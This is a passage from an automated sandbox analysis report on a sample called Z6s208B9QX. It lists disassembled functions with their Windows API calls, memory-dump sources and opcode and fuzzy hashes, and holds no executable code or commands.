                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                        • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2027346449-0
                                                                                                        • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                        • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                        • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                        • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                        Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                        • GetMenu.USER32 ref: 0047A703
                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                        • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                        • _wcslen.LIBCMT ref: 0047A79E
                                                                                                        • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                        • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3257027151-0
                                                                                                        • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                        • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                        • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                        • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                        Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastselect
                                                                                                        • String ID:
                                                                                                        • API String ID: 215497628-0
                                                                                                        • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                        • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                        • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                        • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                        Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 0044443B
                                                                                                        • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                        • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 87235514-0
                                                                                                        • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                        • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                        • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                        • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                        Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 00444633
                                                                                                        • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                        • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                        • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                        • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                        • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                        • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 87235514-0
                                                                                                        • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                        • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                        • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                        • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                        Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                        • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                        • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2354583917-0
                                                                                                        • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                        • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                        • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                        • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                        Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 2449869053-3837949563
                                                                                                        • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                        • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                        • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                        • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                        Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                        • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                        • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                        • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                        Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 896007046-0
                                                                                                        • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                        • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                        • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                        • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                        Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                        • GetFocus.USER32 ref: 00448ACF
                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3429747543-0
                                                                                                        • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                        • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                        • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                        • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                        Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3300667738-0
                                                                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                        Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                        • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                        • String ID: %lu$\VH
                                                                                                        • API String ID: 3164766367-2432546070
                                                                                                        • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                        • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                        • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                        • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                        Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
